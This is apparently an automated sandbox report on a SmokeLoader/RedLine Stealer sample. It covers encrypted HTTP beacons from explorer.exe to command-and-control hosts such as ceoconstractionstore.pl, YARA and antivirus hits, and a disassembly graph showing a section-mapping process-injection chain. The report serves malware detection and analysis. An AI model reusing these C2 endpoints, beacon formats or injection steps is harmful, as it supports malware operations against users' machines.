                                                                                                                  Oct 4, 2024 15:10:05.886300087 CEST173OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be ac 5d 70 d4
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)]pVlE.vkzS;841e)4iT]3Bs/p{2!oFdp}D
                                                                                                                  Oct 4, 2024 15:10:06.529943943 CEST151INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 7
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:06 GMT
                                                                                                                  Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                  Data Ascii: }O
                                                                                                                  Oct 4, 2024 15:10:06.535003901 CEST288OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://trpngknppeg.com/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 246
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:06.535003901 CEST246OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be 98 31 44 9c
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JsC)1DKgua~;Z8;RQ^1-,RQERx#][Jb^]p}eqfd4<Y%`dA-k;`7]mkBaUo&Hcu;b8
                                                                                                                  Oct 4, 2024 15:10:06.871114016 CEST144INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 0
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:06 GMT
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST292OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://rljealjxpbaxswq.net/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 363
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:32.228328943 CEST363OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be 84 55 49 ba
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)UI8T juhHWL@EDEY>#S0>xxkQq<}Av8?h@qq#fuUsnz`u5T>|pZP!u2ws{U)C2AQn<yM
                                                                                                                  Oct 4, 2024 15:10:32.427405119 CEST151INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 7
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:32 GMT
                                                                                                                  Data Raw: 03 00 00 00 7d 4f d6
                                                                                                                  Data Ascii: }O
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST291OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://qburaxgwiulsnc.com/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 261
                                                                                                                  Host: ceoconstractionstore.pl
                                                                                                                  Oct 4, 2024 15:10:32.432388067 CEST261OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 1b 1d bc ca bf 4a 73 43 29 be 84 24 68 b9
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JsC)$hmi7K#`HZ4fQ.N8Cp+i#FioNd%v2vvj^#r?gqz+/i={0miP;[e)6fY5@8a
                                                                                                                  Oct 4, 2024 15:10:32.774131060 CEST144INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Content-Length: 0
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:32 GMT


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  2192.168.2.949713193.46.217.78803504C:\Windows\explorer.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 4, 2024 15:10:31.217560053 CEST286OUTPOST /index.php HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://xtihbxaqoab.com/
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Length: 356
                                                                                                                  Host: unicexpertmagazine.pw
                                                                                                                  Oct 4, 2024 15:10:31.217560053 CEST356OUTData Raw: a1 5f 0e 5e 84 44 5f b9 c8 49 a6 cd 8c c3 2d 38 50 44 b5 2d 15 bd 36 23 dd 54 cb 18 7a fd 07 26 c5 24 ac 8c 4f ab 7b 4d 2c b0 cd 11 b3 45 16 4d a6 60 28 1e cf 32 6d 2d d9 82 ec 5e cd da f3 84 e5 8c 8d e0 18 1d ce ca bf 4a 72 43 29 be e4 17 6d a8
                                                                                                                  Data Ascii: _^D_I-8PD-6#Tz&$O{M,EM`(2m-^JrC)m;BIUbIU un+;o;a`%\V\aSPx{jb)N7^Oi|'z]SD1L~Lc8!pXmglW>s
                                                                                                                  Oct 4, 2024 15:10:32.225739956 CEST602INHTTP/1.1 404 Not Found
                                                                                                                  Server: nginx/1.18.0
                                                                                                                  Date: Fri, 04 Oct 2024 13:10:32 GMT
                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 31 61 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 [TRUNCATED]
                                                                                                                  Data Ascii: 1a2<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at unicexpertmagazine.pw Port 80</address></body></html>0


                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:09:09:34
                                                                                                                  Start date:04/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\RmbF3635xY.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"C:\Users\user\Desktop\RmbF3635xY.exe"
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:222'720 bytes
                                                                                                                  MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1582993231.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1583016209.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1583256735.000000000067D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1583091687.0000000000621000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:09:09:45
                                                                                                                  Start date:04/10/2024
                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                  Imagebase:0x7ff633410000
                                                                                                                  File size:5'141'208 bytes
                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  Reputation:high
                                                                                                                  Has exited:false

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:09:10:05
                                                                                                                  Start date:04/10/2024
                                                                                                                  Path:C:\Users\user\AppData\Roaming\jtruajj
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\jtruajj
                                                                                                                  Imagebase:0x400000
                                                                                                                  File size:222'720 bytes
                                                                                                                  MD5 hash:31059E7394B880F017E83804D9B716AB
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Yara matches:
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1849964354.00000000006B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1850164583.000000000083D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.1850069040.00000000007E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1849937727.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 82%, ReversingLabs
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  Disassembly

                                                                                                                  Reset < >

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:8.5%
                                                                                                                    Dynamic/Decrypted Code Coverage:19.9%
                                                                                                                    Signature Coverage:49.4%
                                                                                                                    Total number of Nodes:156
                                                                                                                    Total number of Limit Nodes:6
                                                                                                                    execution_graph 4140 402e42 4143 402e47 4140->4143 4141 402f18 4142 401902 8 API calls 4141->4142 4145 402f4c 4141->4145 4142->4145 4143->4141 4144 4020ea NtQuerySystemInformation 4143->4144 4143->4145 4144->4141 4299 418986 4300 418990 4299->4300 4301 418940 SetPriorityClass 4300->4301 4302 4189ad 4300->4302 4301->4300 4246 40190e 4247 401912 4246->4247 4249 4018b5 4246->4249 4248 401946 Sleep 4247->4248 4250 401961 4248->4250 4251 401529 7 API calls 4250->4251 4252 401972 4250->4252 4251->4252 4013 418ed0 4016 418a70 4013->4016 4015 418ed5 4017 418a7d 4016->4017 4018 418b80 7 API calls 4017->4018 4019 418cc6 4017->4019 4021 418bf8 7 API calls 4018->4021 4020 418cd4 SetCommState 4019->4020 4026 418ced 4019->4026 4020->4019 4022 418ca4 4021->4022 4023 418c98 ObjectPrivilegeAuditAlarmW 4021->4023 4024 418cb5 4022->4024 4025 418cad WaitForSingleObject 4022->4025 4023->4022 4024->4019 4025->4024 4027 418daa 4026->4027 4028 418cfa 9 API calls 4026->4028 4040 418740 LocalAlloc 4027->4040 4035 418d88 4028->4035 4032 418dfd 4042 4189d0 4032->4042 4033 418daf LoadLibraryA 4041 418770 GetModuleHandleW GetProcAddress VirtualProtect 4033->4041 4035->4027 4036 418e02 4037 418e43 InterlockedCompareExchange 4036->4037 4038 418e23 MoveFileW 4036->4038 4039 418e5d 4036->4039 4037->4036 4038->4036 4039->4015 4040->4033 4041->4032 4043 4189f9 QueryDosDeviceW 4042->4043 4044 418a0a 4042->4044 4043->4044 4053 418910 4044->4053 4047 418a25 4056 418950 4047->4056 4048 418a1d FreeEnvironmentStringsA 4048->4047 4051 418a57 4051->4036 4052 418a3c HeapCreate GetNumaProcessorNode 4052->4051 4054 418921 FatalAppExitA GetModuleHandleA 4053->4054 4055 418933 4053->4055 4054->4055 4055->4047 4055->4048 4057 41896c 4056->4057 4058 41895e BuildCommDCBA 4056->4058 4059 418974 FreeEnvironmentStringsA 4057->4059 4062 41897c 4057->4062 4058->4062 4059->4062 4060 4189ad 4060->4051 4060->4052 4062->4060 4063 418940 4062->4063 4066 4188c0 4063->4066 4067 4188eb 4066->4067 4068 4188dc SetPriorityClass 4066->4068 4067->4062 4068->4067 4152 4014db 4153 40148f 4152->4153 4161 401469 4152->4161 4153->4152 4154 4015d5 NtDuplicateObject 4153->4154 4153->4161 4155 4015f2 NtCreateSection 4154->4155 4154->4161 4156 401672 NtCreateSection 4155->4156 4157 401618 NtMapViewOfSection 4155->4157 4159 40169e 4156->4159 4156->4161 4157->4156 4158 40163b NtMapViewOfSection 4157->4158 4158->4156 4160 401659 4158->4160 4159->4161 4162 4016a8 NtMapViewOfSection 4159->4162 4160->4156 4162->4161 4163 4016cf NtMapViewOfSection 4162->4163 4163->4161 4069 5e003c 4070 5e0049 4069->4070 4082 5e0e0f SetErrorMode SetErrorMode 4070->4082 4075 5e0265 4076 5e02ce VirtualProtect 4075->4076 4078 5e030b 4076->4078 4077 5e0439 VirtualFree 4081 5e04be LoadLibraryA 4077->4081 4078->4077 4080 5e08c7 4081->4080 4083 5e0223 4082->4083 4084 5e0d90 4083->4084 4085 5e0dad 4084->4085 4086 5e0dbb GetPEB 4085->4086 4087 5e0238 VirtualAlloc 4085->4087 4086->4087 4087->4075 4257 401922 4258 401930 4257->4258 4259 401946 Sleep 4258->4259 4260 401961 4259->4260 4261 401529 7 API calls 4260->4261 4262 401972 4260->4262 4261->4262 4088 67fd0e 4089 67fd1e 4088->4089 4090 67fd12 4088->4090 4092 67fd1f 4090->4092 4093 67fd2e 4092->4093 4096 6804bf 4093->4096 4097 6804da 4096->4097 4098 6804e3 CreateToolhelp32Snapshot 4097->4098 4099 6804ff Module32First 4097->4099 4098->4097 4098->4099 4100 68050e 4099->4100 4101 67fd37 4099->4101 4103 68017e 4100->4103 4101->4089 4104 6801a9 4103->4104 4105 6801ba VirtualAlloc 4104->4105 4106 6801f2 4104->4106 4105->4106 4106->4106 4279 401534 4280 401546 4279->4280 4281 4015d5 NtDuplicateObject 4280->4281 4288 4016f1 4280->4288 4282 4015f2 NtCreateSection 4281->4282 4281->4288 4283 401672 NtCreateSection 4282->4283 4284 401618 NtMapViewOfSection 4282->4284 4286 40169e 4283->4286 4283->4288 4284->4283 4285 40163b NtMapViewOfSection 4284->4285 4285->4283 4287 401659 4285->4287 4286->4288 4289 4016a8 NtMapViewOfSection 4286->4289 4287->4283 4289->4288 4290 4016cf NtMapViewOfSection 4289->4290 4290->4288 4291 5e092b GetPEB 4292 5e0972 4291->4292 4107 402ffa 4108 403024 4107->4108 4109 40313d 4107->4109 4108->4109 4110 4030df RtlCreateUserThread NtTerminateProcess 4108->4110 4110->4109 4111 402ebc 4114 402eb4 4111->4114 4112 402f18 4116 402f4c 4112->4116 4122 401902 4112->4122 4114->4112 4114->4116 4117 4020ea 4114->4117 4118 4020fb 4117->4118 4119 40214e 4118->4119 4120 402152 NtQuerySystemInformation 4118->4120 4121 40216e 4118->4121 4119->4118 4119->4120 4120->4119 4121->4112 4123 401913 4122->4123 4124 401946 Sleep 4123->4124 4125 401961 4124->4125 4127 401972 4125->4127 4128 401529 4125->4128 4127->4116 4129 401539 4128->4129 4130 4015d5 NtDuplicateObject 4129->4130 4137 4016f1 4129->4137 4131 4015f2 NtCreateSection 4130->4131 4130->4137 4132 401672 NtCreateSection 4131->4132 4133 401618 NtMapViewOfSection 4131->4133 4135 40169e 4132->4135 4132->4137 4133->4132 4134 40163b NtMapViewOfSection 4133->4134 4134->4132 4136 401659 4134->4136 4135->4137 4138 4016a8 NtMapViewOfSection 4135->4138 4136->4132 4137->4127 4138->4137 4139 4016cf NtMapViewOfSection 4138->4139 4139->4137 4164 4020fc 4166 402107 4164->4166 4165 402152 NtQuerySystemInformation 4165->4166 4166->4165 4167 40216e 4166->4167

                                                                                                                    Executed Functions

                                                                                                                    Function 00418A70 Relevance: 54.6, APIs: 29, Strings: 2, Instructions: 321filewindowlibraryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 418a70-418a98 2 418aa0-418aa7 0->2 3 418ad4-418ada 2->3 4 418aa9-418ad0 2->4 5 418adc-418ae8 3->5 6 418aee-418af8 3->6 4->3 5->6 7 418b33-418b3a 6->7 8 418afa-418b29 6->8 7->2 9 418b40-418b46 7->9 8->7 11 418b48-418b4e 9->11 12 418b50-418b56 11->12 13 418b5c-418b66 11->13 12->13 14 418b68 13->14 15 418b6a-418b71 13->15 14->15 15->11 16 418b73-418b7a 15->16 17 418b80-418c96 InterlockedCompareExchange GetFocus ReadConsoleA FindAtomA SearchPathA SetConsoleMode SearchPathW GetDefaultCommConfigA CopyFileExW CreatePipe GetEnvironmentStringsW WriteConsoleOutputA GetModuleFileNameA GetSystemTimeAdjustment 16->17 18 418cc6-418cd2 16->18 22 418ca4-418cab 17->22 23 418c98-418c9e ObjectPrivilegeAuditAlarmW 17->23 19 418cd4-418ce2 SetCommState 18->19 26 418ce4-418ceb 19->26 27 418ced-418cf4 19->27 24 418cb5-418cc3 22->24 25 418cad-418caf WaitForSingleObject 22->25 23->22 24->18 25->24 26->19 26->27 28 418daa-418db9 call 418740 27->28 29 418cfa-418da4 GetConsoleAliasesLengthW GetComputerNameA CopyFileW GetFileAttributesA GetConsoleAliasExesLengthW GetBinaryType FormatMessageA GetLongPathNameA PurgeComm 27->29 35 418dbb-418dcc 28->35 36 418ded-418df8 LoadLibraryA call 418770 28->36 29->28 39 418dd0-418de0 35->39 40 418dfd-418e0e call 4189d0 36->40 41 418de2 39->41 42 418de8-418deb 39->42 47 418e10-418e17 40->47 41->42 42->36 42->39 48 418e19-418e27 MoveFileW 47->48 49 418e2d-418e33 47->49 48->49 51 418e35 call 418760 49->51 52 418e3a-418e41 49->52 51->52 55 418e43-418e4e InterlockedCompareExchange 52->55 56 418e54-418e5b 52->56 55->56 56->47 57 418e5d-418e6d 56->57 58 418e70-418e80 57->58 60 418e82 58->60 61 418e89-418e8c 58->61 60->61 61->58 62 418e8e-418e99 61->62 63 418ea0-418ea5 62->63 64 418ea7-418ead 63->64 65 418eaf-418eb5 63->65 64->65 66 418eb7-418ec4 64->66 65->63 65->66
                                                                                                                    APIs
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
                                                                                                                    • GetFocus.USER32 ref: 00418B91
                                                                                                                    • ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
                                                                                                                    • FindAtomA.KERNEL32(00000000), ref: 00418BA5
                                                                                                                    • SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
                                                                                                                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
                                                                                                                    • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
                                                                                                                    • GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
                                                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
                                                                                                                    • CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
                                                                                                                    • WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
                                                                                                                    • ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
                                                                                                                    • SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
                                                                                                                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
                                                                                                                    • CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
                                                                                                                    • GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
                                                                                                                    • GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
                                                                                                                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
                                                                                                                    • GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
                                                                                                                    • PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
                                                                                                                    • LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
                                                                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
                                                                                                                    • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582631929.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40b000_RmbF3635xY.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
                                                                                                                    • String ID: k`$}$
                                                                                                                    • API String ID: 2220722107-956986773
                                                                                                                    • Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
                                                                                                                    • Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
                                                                                                                    • Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9
                                                                                                                    Function 004014DB Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 243nativeCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 68 4014db-4014e7 69 401486-40148b 68->69 70 4014e9 68->70 71 401550-401569 70->71 72 4014eb 70->72 77 40155d-40156c call 4011a4 71->77 74 40155a 72->74 75 4014ed-4014fb 72->75 74->77 80 40149a-4014a8 75->80 81 4014fd-4014ff 75->81 84 40156e-40157f 77->84 85 4014c1-4014c8 80->85 83 401501 81->83 81->84 88 401504-401518 83->88 89 40148f 83->89 86 401581 84->86 87 401584-401589 84->87 90 401469-401485 call 4011a4 85->90 91 4014ca 85->91 86->87 98 4018a6-4018ae 87->98 99 40158f-4015a0 87->99 88->85 92 40151a 88->92 89->80 90->69 91->68 95 401539-401555 92->95 96 40151c-401526 92->96 95->71 98->87 106 4018a4-4018b3 99->106 107 4015a6-4015cf 99->107 109 4018c8 106->109 110 4018b9-4018c4 106->110 107->106 115 4015d5-4015ec NtDuplicateObject 107->115 109->110 112 4018cb-4018ff call 4011a4 109->112 110->112 115->106 117 4015f2-401616 NtCreateSection 115->117 119 401672-401698 NtCreateSection 117->119 120 401618-401639 NtMapViewOfSection 117->120 119->106 124 40169e-4016a2 119->124 120->119 122 40163b-401657 NtMapViewOfSection 120->122 122->119 125 401659-40166f 122->125 124->106 127 4016a8-4016c9 NtMapViewOfSection 124->127 125->119 127->106 129 4016cf-4016eb NtMapViewOfSection 127->129 129->106 130 4016f1 call 4016f6 129->130
                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1582608813.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
